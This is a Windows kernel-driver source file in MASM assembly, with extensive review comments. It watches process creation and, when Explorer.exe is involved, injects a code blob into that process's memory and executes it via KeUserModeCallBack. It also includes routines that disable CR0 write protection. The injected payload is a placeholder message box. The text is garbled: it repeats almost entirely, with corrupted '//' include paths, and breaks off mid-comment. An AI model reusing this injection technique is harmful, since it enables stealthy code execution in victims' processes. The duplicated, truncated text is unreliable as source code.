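.386p                                   ; the leading dot is missing in this copy; the "p" form also admits the privileged mov cr0 encodings used below
.model flat, stdcall                    ; 32-bit flat model; the ntoskrnl exports this driver calls are stdcall
option casemap:none                     ; identifiers are case-sensitive (GetUserPEB_End and GetUserPEB_end are different symbols)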
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc
includelib \masm32\lib\w2k\ntoskrnl.lib
include \masm32\Macros\Strings.mac
include useful.asm
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; R E A D O N L Y D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
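.const
; Device and symbolic-link names.  NT object paths are backslash-separated; the
; "\\Device\\..." spelling is the form the CCOUNTED_UNICODE_STRING macro is used
; with elsewhere in this toolkit (every backslash in this copy had been turned
; into "//", which the object manager would not accept).
CCOUNTED_UNICODE_STRING "\\Device\\ring3code", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\DosDevices\\ring3code", g_usSymbolicLinkName, 4
; Image file name NotifyRoutine looks for (compared case-insensitively).
Target db "Explorer.exe",0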
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; U N I N I T I A L I Z E D D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.data?
g_dwImageFileNameOffset DWORD ?         ; EPROCESS.ImageFileName offset found by GetImageFileNameOffset; 0 when the scan found nothing
g_fbNotifyRoutineSet BOOL ?             ; by its name, whether the process-notify routine got registered
szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?) ; ANSI image path built by NotifyRoutine; a single global buffer shared by concurrent callbacks
notAttack BOOL ?                        ; one-shot guard read by NotifyRoutine and cleared after a successful AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
myproc:
; Test payload: CallToUserMode copies the bytes from here up to length_myproc into
; the target process and runs them there.  The original author's notes, paraphrased:
; resolve API addresses before calling anything (the PEB handed to CallToUserMode
; gives a starting point for that); this was only written to prove that control
; reaches ring 3 -- run in ring 0 it would crash the system, in ring 3 it either
; shows a message box or faults in a way that shows the code executed in user mode.
; What is visible here does not support more than that: the body is not
; position-independent (invoke emits a call to wherever MessageBox resolves inside
; this driver image, and the $CTA0 strings live in the driver's own data, neither
; of which means anything at the user-mode copy's address), and hDlg is defined
; nowhere in this file.  Treat it as a placeholder.
invoke MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1
; Returns to whatever called into the copied buffer (the user-mode callback dispatcher).
retn
length_myproc =$ - myproc   ; byte count handed to CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
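DisableWriteProtect proc
    ; Clear CR0.WP (bit 16) so ring-0 writes ignore page-level write protection.
    ; Out:  eax = the previous CR0 image; hand it back to EnableWriteProtect.
    ;       No other register is changed (the original built a stack frame and
    ;       shuffled eax through a local for the same result).
    ; Hazards the caller has to own: CR0 is per-CPU and nothing here raises IRQL
    ; or disables interrupts, so a context switch or CPU migration between this
    ; call and EnableWriteProtect leaves WP cleared on one CPU and writes a stale
    ; image on another.  Note that the only writes this driver performs between
    ; the two calls go to freshly allocated PAGE_READWRITE user pages
    ; (CallToUserMode), which do not need WP cleared at all.
    mov eax, cr0
    push eax                            ; keep the untouched image for the caller
    and eax, not 10000h                 ; CR0.WP = 0
    mov cr0, eax
    pop eax
    ret
DisableWriteProtect endp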
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
EnableWriteProtect proc uses eax uOldAttr:dword
    ; Write a previously saved CR0 image back (the value DisableWriteProtect
    ; returned).  The whole register is restored, not just the WP bit, so the
    ; caller must pass the image that was read on this same CPU.  eax is saved
    ; and restored by USES; the procedure leaves no register visibly changed.
    mov eax, uOldAttr
    mov cr0, eax
    ret
EnableWriteProtect endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
    ; IRP_MJ_CREATE / IRP_MJ_CLOSE handler: every open and close succeeds with
    ; no data transferred.  Completes the IRP and returns STATUS_SUCCESS.
    mov ecx, pIrp
    assume ecx:ptr _IRP
    mov [ecx].IoStatus.Status, STATUS_SUCCESS
    mov [ecx].IoStatus.Information, 0
    assume ecx:nothing
    ; The IRP is not touched again after completion.
    fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT
    mov eax, STATUS_SUCCESS
    ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
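; Structure offsets GetUserPEB relies on.  They are hard-coded per kernel build
; (unlike GetImageFileNameOffset, which scans for its field) and look like the
; 32-bit Windows XP layout -- verify against the target kernel's symbols.
KPCR_CURRENT_THREAD     = 124h          ; fs:[124h], read as the current KTHREAD
KTHREAD_TRAP_FRAME      = 134h          ; KTHREAD.TrapFrame (per the original comment)
KTHREAD_PROCESS         = 044h          ; KTHREAD -> EPROCESS the thread currently runs in; presumably ApcState.Process, which KeAttachProcess redirects -- confirm
EPROCESS_PEB            = 1B0h          ; EPROCESS.Peb (per the original comment)
GetUserPEB proc near
    ; Out: eax = user-mode PEB of the process the current thread is attached to,
    ;            or 0 when the thread has no trap frame (it never came from user
    ;            mode) or the process has no PEB (system process).
    ;      ZF reflects eax, so callers may `jz` straight after the call.
    ; ebx is preserved; only eax and flags change.
    ; Fix relative to the original: the jump targeted GetUserPEB_End while the
    ; label is GetUserPEB_end, which option casemap:none treats as different symbols.
    assume fs:nothing
    push ebx
    mov ebx, dword ptr fs:[KPCR_CURRENT_THREAD]
    mov eax, dword ptr [ebx+KTHREAD_TRAP_FRAME]
    test eax, eax
    jz GetUserPEB_end                   ; no trap frame: nothing user-mode to return
    mov eax, dword ptr [ebx+KTHREAD_PROCESS]
    mov eax, dword ptr [eax+EPROCESS_PEB]
    test eax, eax                       ; leave ZF set for a null PEB
GetUserPEB_end:
    pop ebx
    retn
GetUserPEB endp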
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
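CallToUserMode proc uses esi edi lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD
    ; Copy dwSize bytes of code at dwAddr into a fresh user-mode buffer of the
    ; process the current thread is attached to, run it through KeUserModeCallBack
    ; using PEB.KernelCallbackTable (PEB+2Ch on 32-bit) as the dispatch table --
    ; ApiNumber is chosen so that table + ApiNumber*4 lands on the buffer -- and
    ; release the buffer again.
    ;   lpPeb  - user-mode PEB of the attached process (from GetUserPEB)
    ;   dwAddr - kernel address of the code to copy
    ;   dwSize - number of bytes to copy
    ;   eax    - NTSTATUS of the callback, or of the allocation when that failed
    ; Fixes relative to the original: lpPEB / kernel_callback_table /
    ; allocation_size were spelled or never declared so the block could not
    ; assemble; `mov allocation_size, (dwSize+1024)` is not an encodable
    ; instruction; an explicit `leave` before `ret` in a procedure with locals
    ; unwinds the frame twice; NtFreeVirtualMemory was handed values where it
    ; takes pointers; and the Nt* entry points were called from kernel mode --
    ; they keep the thread's previous mode, so the kernel-stack pointers passed
    ; here would fail the user-mode probe.  The Zw* entry points are used instead,
    ; the pages are allocated executable since they hold code, and MEM_RELEASE
    ; (RegionSize 0) frees the whole reservation rather than decommitting only.
    ; Caveats left in place:
    ;   * lpPeb is user memory read without ProbeForRead / __try; an inaccessible
    ;     PEB bug-checks.
    ;   * NOTE(review): the user-mode dispatcher calls *through* the table entry
    ;     it indexes, i.e. it loads a pointer from the start of the buffer and
    ;     calls that; check against the target ntdll whether a pointer, not raw
    ;     code, has to sit in the buffer's first dword.
    ;   * KeUserModeCallBack is the spelling this file links against; the
    ;     ntoskrnl export is KeUserModeCallback, so the declaration (not visible
    ;     here) must map it.
    local kernel_callback_table:DWORD
    local base_address:PVOID
    local allocation_size:DWORD
    local out_buffer:PVOID
    local out_length:DWORD
    local status:NTSTATUS

    mov eax, lpPeb
    mov eax, dword ptr [eax+2Ch]        ; PEB.KernelCallbackTable
    mov kernel_callback_table, eax

    ; Reserve + commit dwSize+1024 bytes in the current (attached) process; -1 is
    ; the current-process handle.
    and base_address, 0
    mov eax, dwSize
    add eax, 1024
    mov allocation_size, eax
    invoke ZwAllocateVirtualMemory, -1, addr base_address, 0, addr allocation_size, MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE
    mov status, eax
    .if eax == STATUS_SUCCESS
        ; Copy the code into the user buffer (direction flag cleared explicitly).
        mov esi, dwAddr
        mov edi, base_address
        mov ecx, dwSize
        cld
        rep movsb

        ; ApiNumber = (buffer - KernelCallbackTable) / sizeof(PVOID)
        mov edx, base_address
        sub edx, kernel_callback_table
        shr edx, 2
        and out_buffer, 0
        and out_length, 0
        ; KeUserModeCallBack(ApiNumber, InputBuffer, InputLength, &OutputBuffer, &OutputLength)
        lea eax, out_length
        push eax
        lea eax, out_buffer
        push eax
        push 0
        lea eax, out_buffer             ; no input; any valid pointer will do
        push eax
        push edx
        call KeUserModeCallBack
        mov status, eax

        ; Release the whole reservation; MEM_RELEASE requires RegionSize == 0.
        and allocation_size, 0
        invoke ZwFreeVirtualMemory, -1, addr base_address, addr allocation_size, MEM_RELEASE
    .endif
    mov eax, status
    ret
CallToUserMode endp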
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
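AttackProcess proc pEpr:PVOID
    ; Attach to the process behind pEpr (an EPROCESS reference the caller holds),
    ; push a copy of myproc into it and run it via CallToUserMode, then detach.
    ; Out: eax = STATUS_UNSUCCESSFUL when the attached process exposes no
    ;            user-mode PEB (kernel thread / system process), otherwise the
    ;            status CallToUserMode returned.  NotifyRoutine only clears its
    ;            one-shot guard on STATUS_SUCCESS, so a failed callback is retried
    ;            on the next matching process.
    ; Fixes relative to the original:
    ;   * KeAttachProcess returns VOID; testing eax for STATUS_SUCCESS afterwards
    ;     decided on leftover register contents.
    ;   * `jz Attack_End_err:` (trailing colon) and EnableWriteProcect (typo)
    ;     did not assemble, and the no-PEB exit skipped KeDetachProcess,
    ;     leaving the thread attached.  Every path now detaches.
    ;   * The CR0.WP toggling around the call is gone: CallToUserMode only
    ;     writes to freshly allocated user pages, which need no WP change, and
    ;     flipping a per-CPU register without disabling preemption is a hazard
    ;     in itself.
    local status:NTSTATUS
    mov status, STATUS_UNSUCCESSFUL
    invoke KeAttachProcess, pEpr
    invoke GetUserPEB
    .if eax != 0
        invoke CallToUserMode, eax, addr myproc, length_myproc
        mov status, eax
    .endif
    invoke KeDetachProcess
    mov eax, status
    ret
AttackProcess endp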
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NotifyRoutine
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
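NotifyRoutine proc uses esi dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN
    ; PsSetCreateProcessNotifyRoutine callback.  On process creation it resolves
    ; the parent process (falling back to the new process when the parent cannot
    ; be looked up), converts its image path to ANSI and, when the file-name
    ; component equals Target ("Explorer.exe", case-insensitively), injects once
    ; via AttackProcess.  notAttack is the one-shot guard: cleared after a
    ; successful injection, so the driver injects at most once per load.
    ; Fixes relative to the original:
    ;   * bCreate is honoured (it was loaded into eax and ignored), so process
    ;     exits no longer trigger a user-mode callback on an exiting thread.
    ;   * the __strcmpi result was tested inverted (non-zero means *different*).
    ;   * only the component after the last '\' is compared, so a full image
    ;     path can match the bare file name; the converted string is explicitly
    ;     NUL-terminated before it is scanned, and the conversion status is
    ;     checked instead of dropped.
    ;   * notAttacked (undeclared) is the notAttack global.
    ; Still worth knowing: szProcessName is one global buffer shared by concurrent
    ; callbacks, and the parent-first lookup presumably exists because the
    ; callback runs on the creating thread, whose process is the parent -- the
    ; one a user-mode callback can actually be made on.  us.Buffer is released
    ; with ExFreePool exactly as before; GetImageFilePath is not visible here.
    local peProcess:PVOID               ; referenced EPROCESS, released on every path below
    local us:UNICODE_STRING             ; image path from GetImageFilePath
    local as:ANSI_STRING                ; ANSI view over szProcessName

    ; bCreate is a BOOLEAN (one byte); only the low byte is meaningful.
    movzx eax, byte ptr bCreate
    .if eax == 0
        ret
    .endif

    ; The pushed dword is the output slot for PsLookupProcessByProcessId
    ; (esp points at it when invoke pushes the argument).
    push eax
    invoke PsLookupProcessByProcessId, dwParentId, esp
    pop peProcess
    .if eax != STATUS_SUCCESS
        push eax
        invoke PsLookupProcessByProcessId, dwProcessId, esp
        pop peProcess
        .if eax != STATUS_SUCCESS
            ret                         ; nothing referenced, nothing to release
        .endif
    .endif
    ; From here on peProcess carries a reference that must be dropped.

    invoke GetImageFilePath, peProcess, addr us
    .if eax == STATUS_SUCCESS
        lea eax, szProcessName
        mov as.Buffer, eax
        mov as.MaximumLength, IMAGE_FILE_PATH_LEN - 1   ; leave room for the terminator
        and as._Length, 0
        invoke RtlUnicodeStringToAnsiString, addr as, addr us, FALSE
        push eax                        ; keep the conversion status across the free
        invoke ExFreePool, us.Buffer
        pop eax
        .if eax == STATUS_SUCCESS
            ; Terminate, then locate the character after the last backslash.
            movzx ecx, as._Length
            mov byte ptr szProcessName[ecx], 0
            lea esi, szProcessName
            mov edx, esi                ; edx = start of the file-name component
            .while byte ptr [esi] != 0
                .if byte ptr [esi] == '\'
                    lea edx, [esi+1]
                .endif
                inc esi
            .endw
            invoke __strcmpi, edx, addr Target
            .if eax == 0
                .if notAttack
                    invoke AttackProcess, peProcess
                    .if eax == STATUS_SUCCESS
                        mov notAttack, FALSE
                    .endif
                .endif
            .endif
        .endif
    .endif
    fastcall ObfDereferenceObject, peProcess
    ret
NotifyRoutine endp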
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
    ; IRP_MJ_DEVICE_CONTROL handler.  No control code is implemented: every
    ; request is completed with STATUS_INVALID_DEVICE_REQUEST and zero bytes of
    ; output, and the same status is returned.  (The original also fetched the
    ; current stack location into edi and stored an intermediate
    ; STATUS_UNSUCCESSFUL; neither was ever read.)
    mov esi, pIrp
    assume esi:ptr _IRP
    mov [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST
    and [esi].IoStatus.Information, 0
    assume esi:nothing
    ; Once completed the IRP must not be dereferenced again, so the return
    ; status is taken from the constant rather than from the IRP.
    fastcall IofCompleteRequest, esi, IO_NO_INCREMENT
    mov eax, STATUS_INVALID_DEVICE_REQUEST
    ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverUnload proc pDriverObject:PDRIVER_OBJECT
    ; Tear down in reverse order of DriverEntry: remove the process-notify
    ; routine (TRUE = remove), drop the DosDevices link, delete the device.
    ; Removal is unconditional -- g_fbNotifyRoutineSet is not consulted -- which
    ; is the safer default: the callback must be gone before this image unloads,
    ; and a remove for a routine that was never registered only returns an error.
    invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE
    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
    mov ecx, pDriverObject
    assume ecx:ptr DRIVER_OBJECT
    invoke IoDeleteDevice, [ecx].DeviceObject
    assume ecx:nothing
    ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; D I S C A R D A B L E C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetImageFileNameOffset
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetImageFileNameOffset proc uses esi ebx
    ; Locate EPROCESS.ImageFileName without hard-coding a per-build offset:
    ; scan the first page (offsets 0..0FFFh) of the current process's EPROCESS
    ; for the 6 characters "system", case-insensitively -- DriverEntry runs in
    ; the System process, whose image name is exactly that.
    ; Offsets noted by the original author: W2K 01FCh, WXP 0174h, WNET 0154h.
    ; Out: eax = offset of the match, or 0 when nothing matched in the page.
    invoke IoGetCurrentProcess
    mov esi, eax                        ; esi = EPROCESS base
    xor ebx, ebx                        ; ebx = candidate offset
    .repeat
        lea eax, [esi+ebx]
        invoke _strnicmp, eax, $CTA0("system"), 6
        .break .if eax == 0             ; found at ebx
        inc ebx
    .until ebx == 1000h
    .if eax != 0
        xor ebx, ebx                    ; not found: report 0
    .endif
    mov eax, ebx
    ret
GetImageFileNameOffset endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
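DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    ; Create the control device and its DosDevices link, install the dispatch
    ; and unload routines, prime the globals, then register NotifyRoutine.
    ; Out: eax = STATUS_SUCCESS, or the failing call's status
    ;            (STATUS_DEVICE_CONFIGURATION_ERROR when IoCreateDevice /
    ;            IoCreateSymbolicLink fail, as before).
    ; Fixes relative to the original:
    ;   * notAttack was initialised to FALSE, which is the "already injected"
    ;     state NotifyRoutine checks for -- the driver could never fire.  It now
    ;     starts TRUE.
    ;   * the PsSetCreateProcessNotifyRoutine status was ignored and
    ;     g_fbNotifyRoutineSet never set; on failure the device and link are
    ;     torn down and the error returned so the driver does not stay loaded
    ;     half-initialised.
    ;   * globals the callback reads are written before the callback can run.
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT

    mov status, STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject
    .if eax == STATUS_SUCCESS
        invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
        .if eax == STATUS_SUCCESS
            mov eax, pDriverObject
            assume eax:ptr DRIVER_OBJECT
            mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose
            mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
            mov [eax].DriverUnload, offset DriverUnload
            assume eax:nothing

            ; Nothing has been injected yet; the offset may legitimately be 0
            ; (scan found nothing) and is recorded as such.
            mov notAttack, TRUE
            and g_fbNotifyRoutineSet, FALSE
            invoke GetImageFileNameOffset
            mov g_dwImageFileNameOffset, eax

            invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE
            mov status, eax
            .if eax == STATUS_SUCCESS
                mov g_fbNotifyRoutineSet, TRUE
            .else
                invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
                invoke IoDeleteDevice, pDeviceObject
            .endif
        .else
            invoke IoDeleteDevice, pDeviceObject
        .endif
    .endif
    mov eax, status
    ret
DriverEntry endp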
.model flat, stdcall                    ; 32-bit flat model; the ntoskrnl exports this driver calls are stdcall
option casemap:none                     ; identifiers are case-sensitive (GetUserPEB_End and GetUserPEB_end are different symbols)
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
include //masm32//include//w2k//ntstatus.inc
include //masm32//include//w2k//ntddk.inc
include //masm32//include//w2k//ntoskrnl.inc
includelib //masm32//lib//w2k//ntoskrnl.lib
include //masm32//Macros//Strings.mac
include useful.asm
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; R E A D O N L Y D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
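.const
; Device and symbolic-link names.  NT object paths are backslash-separated; the
; "\\Device\\..." spelling is the form the CCOUNTED_UNICODE_STRING macro is used
; with elsewhere in this toolkit (every backslash in this copy had been turned
; into "//", which the object manager would not accept).
CCOUNTED_UNICODE_STRING "\\Device\\ring3code", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\DosDevices\\ring3code", g_usSymbolicLinkName, 4
; Image file name NotifyRoutine looks for (compared case-insensitively).
Target db "Explorer.exe",0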
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; U N I N I T I A L I Z E D D A T A
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.data?
g_dwImageFileNameOffset DWORD ?         ; EPROCESS.ImageFileName offset found by GetImageFileNameOffset; 0 when the scan found nothing
g_fbNotifyRoutineSet BOOL ?             ; by its name, whether the process-notify routine got registered
szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?) ; ANSI image path built by NotifyRoutine; a single global buffer shared by concurrent callbacks
notAttack BOOL ?                        ; one-shot guard read by NotifyRoutine and cleared after a successful AttackProcess
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
myproc:
; Test payload: CallToUserMode copies the bytes from here up to length_myproc into
; the target process and runs them there.  The original author's notes, paraphrased:
; resolve API addresses before calling anything (the PEB handed to CallToUserMode
; gives a starting point for that); this was only written to prove that control
; reaches ring 3 -- run in ring 0 it would crash the system, in ring 3 it either
; shows a message box or faults in a way that shows the code executed in user mode.
; What is visible here does not support more than that: the body is not
; position-independent (invoke emits a call to wherever MessageBox resolves inside
; this driver image, and the $CTA0 strings live in the driver's own data, neither
; of which means anything at the user-mode copy's address), and hDlg is defined
; nowhere in this file.  Treat it as a placeholder.
invoke MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1
; Returns to whatever called into the copied buffer (the user-mode callback dispatcher).
retn
length_myproc =$ - myproc   ; byte count handed to CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
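DisableWriteProtect proc
    ; Clear CR0.WP (bit 16) so ring-0 writes ignore page-level write protection.
    ; Out:  eax = the previous CR0 image; hand it back to EnableWriteProtect.
    ;       No other register is changed (the original built a stack frame and
    ;       shuffled eax through a local for the same result).
    ; Hazards the caller has to own: CR0 is per-CPU and nothing here raises IRQL
    ; or disables interrupts, so a context switch or CPU migration between this
    ; call and EnableWriteProtect leaves WP cleared on one CPU and writes a stale
    ; image on another.  Note that the only writes this driver performs between
    ; the two calls go to freshly allocated PAGE_READWRITE user pages
    ; (CallToUserMode), which do not need WP cleared at all.
    mov eax, cr0
    push eax                            ; keep the untouched image for the caller
    and eax, not 10000h                 ; CR0.WP = 0
    mov cr0, eax
    pop eax
    ret
DisableWriteProtect endp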
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
EnableWriteProtect proc uses eax uOldAttr:dword
    ; Write a previously saved CR0 image back (the value DisableWriteProtect
    ; returned).  The whole register is restored, not just the WP bit, so the
    ; caller must pass the image that was read on this same CPU.  eax is saved
    ; and restored by USES; the procedure leaves no register visibly changed.
    mov eax, uOldAttr
    mov cr0, eax
    ret
EnableWriteProtect endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
    ; IRP_MJ_CREATE / IRP_MJ_CLOSE handler: every open and close succeeds with
    ; no data transferred.  Completes the IRP and returns STATUS_SUCCESS.
    mov ecx, pIrp
    assume ecx:ptr _IRP
    mov [ecx].IoStatus.Status, STATUS_SUCCESS
    mov [ecx].IoStatus.Information, 0
    assume ecx:nothing
    ; The IRP is not touched again after completion.
    fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT
    mov eax, STATUS_SUCCESS
    ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
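; Structure offsets GetUserPEB relies on.  They are hard-coded per kernel build
; (unlike GetImageFileNameOffset, which scans for its field) and look like the
; 32-bit Windows XP layout -- verify against the target kernel's symbols.
KPCR_CURRENT_THREAD     = 124h          ; fs:[124h], read as the current KTHREAD
KTHREAD_TRAP_FRAME      = 134h          ; KTHREAD.TrapFrame (per the original comment)
KTHREAD_PROCESS         = 044h          ; KTHREAD -> EPROCESS the thread currently runs in; presumably ApcState.Process, which KeAttachProcess redirects -- confirm
EPROCESS_PEB            = 1B0h          ; EPROCESS.Peb (per the original comment)
GetUserPEB proc near
    ; Out: eax = user-mode PEB of the process the current thread is attached to,
    ;            or 0 when the thread has no trap frame (it never came from user
    ;            mode) or the process has no PEB (system process).
    ;      ZF reflects eax, so callers may `jz` straight after the call.
    ; ebx is preserved; only eax and flags change.
    ; Fix relative to the original: the jump targeted GetUserPEB_End while the
    ; label is GetUserPEB_end, which option casemap:none treats as different symbols.
    assume fs:nothing
    push ebx
    mov ebx, dword ptr fs:[KPCR_CURRENT_THREAD]
    mov eax, dword ptr [ebx+KTHREAD_TRAP_FRAME]
    test eax, eax
    jz GetUserPEB_end                   ; no trap frame: nothing user-mode to return
    mov eax, dword ptr [ebx+KTHREAD_PROCESS]
    mov eax, dword ptr [eax+EPROCESS_PEB]
    test eax, eax                       ; leave ZF set for a null PEB
GetUserPEB_end:
    pop ebx
    retn
GetUserPEB endp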
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserMode
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
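CallToUserMode proc uses esi edi lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD
    ; Copy dwSize bytes of code at dwAddr into a fresh user-mode buffer of the
    ; process the current thread is attached to, run it through KeUserModeCallBack
    ; using PEB.KernelCallbackTable (PEB+2Ch on 32-bit) as the dispatch table --
    ; ApiNumber is chosen so that table + ApiNumber*4 lands on the buffer -- and
    ; release the buffer again.
    ;   lpPeb  - user-mode PEB of the attached process (from GetUserPEB)
    ;   dwAddr - kernel address of the code to copy
    ;   dwSize - number of bytes to copy
    ;   eax    - NTSTATUS of the callback, or of the allocation when that failed
    ; Fixes relative to the original: lpPEB / kernel_callback_table /
    ; allocation_size were spelled or never declared so the block could not
    ; assemble; `mov allocation_size, (dwSize+1024)` is not an encodable
    ; instruction; an explicit `leave` before `ret` in a procedure with locals
    ; unwinds the frame twice; NtFreeVirtualMemory was handed values where it
    ; takes pointers; and the Nt* entry points were called from kernel mode --
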